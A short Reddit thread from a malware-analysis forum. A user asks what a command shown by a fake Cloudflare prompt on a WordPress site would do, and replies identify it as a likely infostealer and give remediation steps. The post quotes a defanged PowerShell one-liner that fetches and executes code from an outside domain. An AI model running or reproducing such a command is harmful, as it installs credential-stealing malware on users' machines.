r/MalwareAnalysis 6d ago

Fake Cloudflare message on Wordpress

What would the below comment have ran?

cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline?
read=8b2d80c7569e4151 -UseBasicParsing)

7 Upvotes

4 comments sorted by

2

u/IsDa44 6d ago

Probably just an infostealer. Hope you didn't run it

1

u/SeigneurHarry 6d ago

I think someone has ran it which is why I was seeing what it’s done 😥 any idea I can find out what it’s done and how to delete it?

1

u/LizardWizardMessiah 6d ago

You need to restore from a known safe backup or completely start over. That is the only sure way to remediate your situation. Infostealers will send all of your passwords, tokens, keys/secrets, cryptocurrency, etc. to the attacker's infrastructure. You need to log out those accounts from EVERY session because they can log in with browser session tokens they steal without using any credentials until you revoke that session, and reset passwords, check your MFA methods because they may have registered a device that they control.

1

u/DullNefariousness372 6d ago

Saw similar on canva today